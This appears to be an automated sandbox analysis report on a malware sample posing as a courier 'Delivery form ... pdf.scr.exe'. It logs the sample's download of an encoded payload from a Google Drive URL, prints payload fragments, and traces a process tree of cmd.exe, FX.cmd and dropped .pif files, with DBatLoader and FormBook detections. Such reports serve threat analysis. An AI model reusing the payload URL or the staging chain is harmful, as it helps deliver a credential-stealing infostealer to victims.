Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 26 Dec 2024 10:52:02 GMT
Location: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-eOMGB1q0geEnm8b4auRR6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 142.250.181.97 | 443 | 6600 | C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 10:52:04 UTC | 223 | OUT | GET /download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.usercontent.google.com
2024-12-26 10:52:07 UTC | 4932 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AFiumC7QtIk4n-bn1F14RDjRK8XFG9USQerVF2QXSpFGVCkpQWVpxsftw3_f47fYdg_evJtb
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="233_Lwnkboxdlyz"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 820516
Last-Modified: Tue, 24 Dec 2024 06:00:32 GMT
Date: Thu, 26 Dec 2024 10:52:07 GMT
Expires: Thu, 26 Dec 2024 10:52:07 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=ZzqbHQ==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                        2024-12-26 10:52:07 UTC4932INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 6b 46 68 55 66 4a 42 49 5a 49 53 45 68 48 78 59 53 47 42 51 64 49 53 45 69 48 52 67 6d 49 42 41 65 46 53 45 6d 47 71 61 75 70 56 6b 6a 70 37 46 4c 56 79 51 62 47 41 38 63 4a 52 45 5a 4a 69 65 6d 72 71 56 5a 49 36 65 78 53 35 4b 45 68 59 2b 53 67 49 6d 52 6b 5a 47 50 68 49 43 47 67 6f 32 52 6b 5a 43 4e 68 70 53 4f 66 6f 79 46 6b 5a 53 49 6b 6f 53 46 6a 35 4b 41 69 5a 47 52 6b 59 2b 45 67 49 61 43 6a 5a 47 52 6b 49 32 47 6c 49 35 2b 6a 49 57 52 6c 49 69 53 68 49 57 50 6b 6f 43 4a 6b 5a 47 52 6a 34 53 41 68 6f 4b 4e 6b 5a 47 51 6a 59 61 55 6a 6e 36 4d 68 5a 47 55 69 4a 4b 45 68 59 2b 53 67 49 6d 52 6b 5a 47 50 68 49 43 47 67 6f 32 52 6b 5a 43 4e 68 70 53 4f 66 6f 79 46 6b 5a 53 49 6b 6f 53 46 6a 35 4b 41 69 5a 47 52 6b 59 2b
                                                                                        Data Ascii: pq6lWSOnsUskFhUfJBIZISEhHxYSGBQdISEiHRgmIBAeFSEmGqaupVkjp7FLVyQbGA8cJREZJiemrqVZI6exS5KEhY+SgImRkZGPhICGgo2RkZCNhpSOfoyFkZSIkoSFj5KAiZGRkY+EgIaCjZGRkI2GlI5+jIWRlIiShIWPkoCJkZGRj4SAhoKNkZGQjYaUjn6MhZGUiJKEhY+SgImRkZGPhICGgo2RkZCNhpSOfoyFkZSIkoSFj5KAiZGRkY+
                                                                                        2024-12-26 10:52:07 UTC4832INData Raw: 61 39 2b 63 6b 64 49 37 2b 31 38 32 6e 50 74 4a 59 39 38 70 32 51 58 36 4d 4b 66 2f 5a 57 47 78 54 73 77 48 78 78 4e 77 4d 36 59 4e 51 41 55 6a 54 75 57 51 39 52 37 51 30 61 46 4c 78 6e 6d 50 38 6d 39 41 4d 6b 34 33 57 41 34 55 4a 51 6b 4b 44 6b 79 41 33 77 4d 30 55 41 33 6b 74 53 64 35 45 46 61 78 4a 78 4d 54 32 2b 42 64 38 66 4a 51 57 71 56 55 2b 75 33 32 68 73 59 32 51 54 74 64 31 6e 37 59 64 42 4b 6a 7a 56 5a 72 31 4e 4a 61 6d 49 72 77 70 61 72 39 61 37 76 4c 72 4b 4b 66 45 42 4e 49 2f 7a 73 42 68 65 4d 42 4f 33 31 4e 76 57 42 6b 48 65 38 58 76 77 55 6e 63 41 6f 48 58 70 55 61 32 75 49 54 4d 32 6e 77 41 6d 51 4f 48 30 50 38 79 62 42 73 57 4d 53 68 76 37 32 36 74 45 35 51 54 30 2b 46 55 36 6f 34 36 33 69 70 46 6b 58 34 43 46 56 6c 48 37 44 58 46 74 61
                                                                                        Data Ascii: a9+ckdI7+182nPtJY98p2QX6MKf/ZWGxTswHxxNwM6YNQAUjTuWQ9R7Q0aFLxnmP8m9AMk43WA4UJQkKDkyA3wM0UA3ktSd5EFaxJxMT2+Bd8fJQWqVU+u32hsY2QTtd1n7YdBKjzVZr1NJamIrwpar9a7vLrKKfEBNI/zsBheMBO31NvWBkHe8XvwUncAoHXpUa2uITM2nwAmQOH0P8ybBsWMShv726tE5QT0+FU6o463ipFkX4CFVlH7DXFta
                                                                                        2024-12-26 10:52:07 UTC1324INData Raw: 71 66 45 62 6d 66 64 6c 5a 36 61 52 4e 64 56 4a 41 38 34 47 43 52 67 31 6c 78 30 6d 55 65 2f 39 30 33 76 63 4b 7a 32 64 37 2b 54 62 41 7a 66 45 56 56 6b 56 39 58 62 6e 54 69 59 6e 4c 6f 79 4b 4d 55 43 39 65 4b 37 78 5a 41 49 39 61 78 68 65 47 33 67 68 66 37 6e 32 66 68 6c 31 4b 48 76 47 42 62 75 4a 34 68 4f 54 41 59 4d 6f 66 65 4b 45 67 75 36 50 4d 46 6a 78 72 4e 41 74 36 6d 52 59 37 4c 70 68 55 41 6b 2b 7a 79 70 55 44 59 75 6d 7a 43 6e 56 52 68 46 5a 33 67 37 66 63 74 73 34 70 51 39 73 6a 58 50 74 62 2b 48 33 70 59 6d 69 50 37 6a 48 74 57 51 4b 43 71 73 6e 53 55 4f 6f 7a 43 32 78 4b 42 41 4a 65 76 53 37 59 2f 4c 76 6d 37 56 53 44 61 7a 31 6d 71 76 64 52 6e 46 2b 6f 62 4a 61 77 75 2b 72 75 2b 32 44 4c 64 47 64 50 78 61 63 44 73 63 74 46 6d 69 45 71 39 37
                                                                                        Data Ascii: qfEbmfdlZ6aRNdVJA84GCRg1lx0mUe/903vcKz2d7+TbAzfEVVkV9XbnTiYnLoyKMUC9eK7xZAI9axheG3ghf7n2fhl1KHvGBbuJ4hOTAYMofeKEgu6PMFjxrNAt6mRY7LphUAk+zypUDYumzCnVRhFZ3g7fcts4pQ9sjXPtb+H3pYmiP7jHtWQKCqsnSUOozC2xKBAJevS7Y/Lvm7VSDaz1mqvdRnF+obJawu+ru+2DLdGdPxacDsctFmiEq97
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 52 4e 38 67 54 71 36 52 61 43 37 4c 5a 31 4d 75 6d 46 79 7a 5a 62 55 76 39 68 65 5a 55 54 41 42 68 4c 6f 78 46 69 66 4c 6d 71 69 41 47 4c 54 65 4b 78 58 38 4b 50 6c 62 6c 4e 49 73 46 31 61 55 4c 71 48 64 66 33 4e 77 6e 64 43 4c 2b 62 6e 74 72 6a 4f 4e 33 69 53 77 56 51 4e 54 53 31 2b 74 4a 5a 55 46 49 78 2b 67 55 6e 50 53 7a 38 58 58 65 6f 66 63 44 35 6f 6b 70 76 41 4b 4a 33 56 54 75 66 37 4a 36 53 74 6d 51 33 6d 53 52 72 44 43 67 4f 30 4c 75 49 63 6a 69 6b 48 6d 31 53 53 78 39 69 68 78 6a 72 62 38 4f 5a 30 47 63 48 41 54 44 71 64 6e 32 64 71 39 77 34 31 58 62 4b 2f 6b 64 56 6c 51 43 59 4d 70 30 43 4b 41 70 31 63 30 69 65 4e 63 79 76 35 72 32 4d 34 6a 4e 65 51 33 73 4e 42 67 44 77 67 50 31 51 63 57 30 4a 6a 6b 64 4e 5a 59 2f 38 59 2f 6f 33 64 32 48 4f 71
                                                                                        Data Ascii: RN8gTq6RaC7LZ1MumFyzZbUv9heZUTABhLoxFifLmqiAGLTeKxX8KPlblNIsF1aULqHdf3NwndCL+bntrjON3iSwVQNTS1+tJZUFIx+gUnPSz8XXeofcD5okpvAKJ3VTuf7J6StmQ3mSRrDCgO0LuIcjikHm1SSx9ihxjrb8OZ0GcHATDqdn2dq9w41XbK/kdVlQCYMp0CKAp1c0ieNcyv5r2M4jNeQ3sNBgDwgP1QcW0JjkdNZY/8Y/o3d2HOq
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 50 50 75 39 2b 6b 64 77 2f 35 77 50 2f 4a 79 47 71 38 4a 44 2b 55 72 54 65 74 35 5a 2f 76 6b 4e 50 75 6b 57 56 6e 62 2b 54 5a 46 4f 30 50 63 4e 5a 6c 48 4d 6e 78 4b 41 71 76 41 48 39 62 32 63 4c 55 46 30 63 43 56 71 76 47 51 53 6b 4a 76 62 52 6e 50 46 53 31 6a 43 66 4e 75 39 56 43 30 35 77 6c 63 75 63 53 2b 55 31 31 64 58 2b 32 68 2f 7a 49 55 59 76 38 6e 56 46 73 67 55 67 6b 6a 59 51 4e 4d 72 65 4f 6f 76 53 65 56 38 69 56 45 57 51 35 76 35 65 39 4d 35 51 4f 74 2f 2f 76 72 67 35 78 70 49 49 63 62 36 52 68 58 4d 59 58 6d 71 75 63 63 34 2f 46 38 77 6f 33 2b 75 39 39 32 62 48 53 39 5a 53 4e 73 46 30 78 73 61 44 56 53 4e 4b 77 72 51 6a 4f 5a 44 70 59 33 66 53 54 79 34 7a 61 48 71 49 31 4a 70 2b 2b 34 31 68 4f 6d 5a 30 69 66 5a 63 46 53 74 37 35 68 34 44 6d 78
                                                                                        Data Ascii: PPu9+kdw/5wP/JyGq8JD+UrTet5Z/vkNPukWVnb+TZFO0PcNZlHMnxKAqvAH9b2cLUF0cCVqvGQSkJvbRnPFS1jCfNu9VC05wlcucS+U11dX+2h/zIUYv8nVFsgUgkjYQNMreOovSeV8iVEWQ5v5e9M5QOt//vrg5xpIIcb6RhXMYXmqucc4/F8wo3+u992bHS9ZSNsF0xsaDVSNKwrQjOZDpY3fSTy4zaHqI1Jp++41hOmZ0ifZcFSt75h4Dmx
2024-12-26 10:52:07 UTC | 1390 | IN | Data Raw: 47 47 4c 66 42 58 77 45 4a 59 32 7a 49 64 74 4e 2b 73 76 38 4d 4a 74 4a 6a 41 4e 67 34 7a 2f 62 70 36 54 46 45 5a 5a 54 59 52 69 4d 47 53 51 6f 54 66 78 51 62 41 55 6e 44 33 77 72 50 50 77 72 74 5a 77 35 72 67 33 36 6e 47 74 41 67 42 47 73 62 76 58 66 66 61 4d 71 71 70 45 64 67 4b 41 52 46 56 69 32 43 72 34 42 2b 74 49 56 39 4e 4e 74 39 41 4c 43 4a 36 53 62 33 56 6c 6b 48 62 58 6e 63 68 4f 63 35 6b 79 74 6b 70 69 4c 32 4c 59 41 41 63 72 75 67 66 33 71 4b 5a 42 67 6a 38 32 42 53 5a 42 67 38 58 43 58 71 69 47 67 42 6a 54 75 77 34 54 68 64 33 71 48 45 49 35 64 79 64 36 59 4c 6a 72 4b 69 4c 63 77 55 6f 38 35 79 47 31 59 52 32 34 6c 63 72 55 65 72 6e 54 52 71 6c 63 79 4e 47 39 67 6e 47 48 30 66 46 63 52 4f 66 56 50 35 38 43 6d 33 32 41 54 4b 6f 55 30 79 2b 2b
                                                                                        Data Ascii: GGLfBXwEJY2zIdtN+sv8MJtJjANg4z/bp6TFEZZTYRiMGSQoTfxQbAUnD3wrPPwrtZw5rg36nGtAgBGsbvXffaMqqpEdgKARFVi2Cr4B+tIV9NNt9ALCJ6Sb3VlkHbXnchOc5kytkpiL2LYAAcrugf3qKZBgj82BSZBg8XCXqiGgBjTuw4Thd3qHEI5dyd6YLjrKiLcwUo85yG1YR24lcrUernTRqlcyNG9gnGH0fFcROfVP58Cm32ATKoU0y++
2024-12-26 10:52:07 UTC | 1390 | IN | Data Raw: 62 52 4a 4c 48 55 67 68 6c 7a 54 50 62 77 44 7a 55 4a 62 58 49 52 77 74 43 70 53 5a 49 51 30 74 68 59 50 65 75 4b 71 34 59 37 78 52 39 53 4d 33 73 31 4d 32 43 79 61 73 55 52 38 44 79 33 55 44 4f 52 44 35 62 56 49 47 52 42 39 51 47 74 53 4b 6e 64 69 47 59 58 47 69 67 71 5a 57 5a 33 74 4a 33 6d 63 76 74 50 66 44 55 67 32 69 61 33 33 63 52 52 5a 45 41 56 64 64 4b 69 4b 69 35 56 48 78 72 65 36 45 53 37 32 53 2f 4a 4a 36 2b 68 51 77 31 44 5a 7a 53 46 44 37 42 66 79 35 4a 76 68 66 56 4d 72 4b 6f 78 4d 77 4d 57 54 79 79 6b 4b 53 55 36 6a 58 6b 79 62 69 30 79 46 33 34 67 55 49 38 50 44 66 72 46 44 46 56 2b 32 57 32 51 70 49 78 33 65 34 2f 33 4d 56 79 49 58 4d 75 30 30 35 30 4b 6d 62 68 50 63 37 30 4b 46 70 68 78 74 6e 59 58 39 42 78 74 54 2b 62 50 63 46 6f 34 69
                                                                                        Data Ascii: bRJLHUghlzTPbwDzUJbXIRwtCpSZIQ0thYPeuKq4Y7xR9SM3s1M2CyasUR8Dy3UDORD5bVIGRB9QGtSKndiGYXGigqZWZ3tJ3mcvtPfDUg2ia33cRRZEAVddKiKi5VHxre6ES72S/JJ6+hQw1DZzSFD7Bfy5JvhfVMrKoxMwMWTyykKSU6jXkybi0yF34gUI8PDfrFDFV+2W2QpIx3e4/3MVyIXMu0050KmbhPc70KFphxtnYX9BxtT+bPcFo4i
2024-12-26 10:52:07 UTC | 1390 | IN | Data Raw: 46 31 37 4b 74 5a 68 4b 56 76 55 64 41 70 70 75 56 70 4a 55 6a 55 30 48 57 59 4e 4a 55 54 71 78 5a 74 52 5a 2b 37 67 4c 71 44 44 55 58 49 55 42 65 67 4a 33 33 31 50 6a 74 55 75 34 57 42 41 6e 61 4d 67 4c 67 4e 73 33 7a 64 47 49 56 54 72 61 34 75 7a 42 51 71 35 55 6b 52 71 5a 79 62 6f 42 65 34 47 6d 74 45 43 41 59 74 46 2b 35 36 76 66 44 47 73 47 46 6a 6a 6a 70 38 73 36 6b 6e 67 32 56 72 69 52 58 54 7a 4f 51 56 48 6d 69 5a 4b 76 2b 4c 4e 47 30 64 68 76 45 71 48 45 42 79 37 6e 55 45 77 6e 66 4f 48 43 41 47 67 76 64 46 63 45 69 65 6a 32 49 62 5a 76 7a 7a 4c 54 6b 4e 6d 2f 4f 39 65 48 7a 78 42 79 48 51 34 2f 77 48 73 50 5a 4f 49 47 57 62 36 47 32 4a 66 42 73 6e 4d 32 4b 62 41 32 6f 77 45 31 45 62 63 4c 48 7a 37 38 44 48 7a 78 6f 45 6e 74 4e 63 69 4e 77 70 30
                                                                                        Data Ascii: F17KtZhKVvUdAppuVpJUjU0HWYNJUTqxZtRZ+7gLqDDUXIUBegJ331PjtUu4WBAnaMgLgNs3zdGIVTra4uzBQq5UkRqZyboBe4GmtECAYtF+56vfDGsGFjjjp8s6kng2VriRXTzOQVHmiZKv+LNG0dhvEqHEBy7nUEwnfOHCAGgvdFcEiej2IbZvzzLTkNm/O9eHzxByHQ4/wHsPZOIGWb6G2JfBsnM2KbA2owE1EbcLHz78DHzxoEntNciNwp0
2024-12-26 10:52:07 UTC | 1390 | IN | Data Raw: 69 77 63 4c 67 45 2f 6a 32 45 44 38 36 4a 32 61 75 79 42 56 39 72 4c 73 4b 6d 31 71 6f 78 6e 62 53 30 70 75 77 73 76 59 6d 38 59 58 63 47 39 72 6e 45 6e 4b 6d 4d 57 58 72 75 65 30 58 79 47 62 64 44 71 66 52 73 71 6b 71 4d 76 75 67 71 72 64 58 4b 72 2f 4e 50 52 4f 50 74 69 72 44 6e 6a 66 2f 56 53 4c 72 54 50 2b 62 41 44 50 39 79 4a 77 42 65 75 55 4e 4c 69 67 6a 48 61 31 50 4f 4f 49 74 67 52 41 57 55 2b 69 31 4e 2b 78 47 77 39 58 52 2f 32 7a 64 30 49 76 49 70 53 37 4c 72 4e 45 53 30 77 76 34 68 4f 6a 4c 62 53 76 34 68 68 39 56 30 4e 57 38 43 7a 54 64 68 4e 61 45 48 53 34 74 67 34 4c 2b 37 53 70 38 71 64 41 34 4c 58 4c 50 75 33 4f 72 48 36 75 63 52 51 4e 6c 5a 2b 30 37 56 69 42 6e 50 76 45 36 45 58 55 59 6a 45 30 70 2f 75 32 59 70 61 48 43 52 6b 61 36 67 6d
                                                                                        Data Ascii: iwcLgE/j2ED86J2auyBV9rLsKm1qoxnbS0puwsvYm8YXcG9rnEnKmMWXrue0XyGbdDqfRsqkqMvugqrdXKr/NPROPtirDnjf/VSLrTP+bADP9yJwBeuUNLigjHa1POOItgRAWU+i1N+xGw9XR/2zd0IvIpS7LrNES0wv4hOjLbSv4hh9V0NW8CzTdhNaEHS4tg4L+7Sp8qdA4LXLPu3OrH6ucRQNlZ+07ViBnPvE6EXUYjE0p/u2YpaHCRka6gm
2024-12-26 10:52:07 UTC | 1390 | IN | Data Raw: 54 57 6d 46 70 48 38 30 4d 78 64 49 50 33 70 51 73 4d 34 6f 6a 47 6b 4f 78 4a 62 58 37 6e 4b 53 56 54 53 34 35 42 6b 6a 36 69 7a 70 38 4a 70 6d 49 4d 7a 62 4f 53 6a 4c 54 48 53 31 65 6e 6d 64 4a 74 75 78 74 73 35 72 57 77 2f 58 71 4f 63 36 6f 72 57 49 34 49 35 6f 58 68 45 64 30 62 4f 65 46 4c 76 77 33 6e 6f 6a 55 4d 44 65 64 32 4f 67 46 4e 57 50 44 2f 4d 49 73 49 77 32 55 4e 43 79 75 2f 53 38 42 61 34 39 76 72 44 35 36 6c 66 55 62 43 32 57 4e 4f 57 4b 42 59 4d 4c 73 44 2f 4e 64 64 46 77 6b 61 38 33 45 73 59 54 4d 55 37 73 75 54 42 63 2b 73 4f 78 4f 36 54 71 6a 2f 74 4c 71 41 41 68 43 77 37 78 79 74 39 4d 64 37 35 70 71 66 56 52 49 69 7a 52 68 64 72 72 6b 4b 2b 31 6d 34 74 43 2f 4e 70 63 6e 42 53 71 49 37 70 57 32 7a 34 49 37 50 61 45 52 6c 66 42 30 67 5a
                                                                                        Data Ascii: TWmFpH80MxdIP3pQsM4ojGkOxJbX7nKSVTS45Bkj6izp8JpmIMzbOSjLTHS1enmdJtuxts5rWw/XqOc6orWI4I5oXhEd0bOeFLvw3nojUMDed2OgFNWPD/MIsIw2UNCyu/S8Ba49vrD56lfUbC2WNOWKBYMLsD/NddFwka83EsYTMU7suTBc+sOxO6Tqj/tLqAAhCw7xyt9Md75pqfVRIizRhdrrkK+1m4tC/NpcnBSqI7pW2z4I7PaERlfB0gZ


                                                                                        Target ID:0
                                                                                        Start time:05:51:58
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'444'352 bytes
                                                                                        MD5 hash:9E67C73F86B034D009280AB03DB20124
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1782801649.00000000023A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1821232938.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:05:52:08
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:05:52:08
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:05:52:08
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Imagebase:0x400000
                                                                                        File size:175'800 bytes
                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:05:52:18
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\Lwnkboxd.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Lwnkboxd.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'444'352 bytes
                                                                                        MD5 hash:9E67C73F86B034D009280AB03DB20124
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.1919328602.0000000002326000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 63%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:05:52:19
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:05:52:19
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:05:52:19
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Imagebase:0x400000
                                                                                        File size:175'800 bytes
                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:05:52:29
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\Lwnkboxd.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Lwnkboxd.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'444'352 bytes
                                                                                        MD5 hash:9E67C73F86B034D009280AB03DB20124
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:05:52:29
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:05:52:29
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:05:52:30
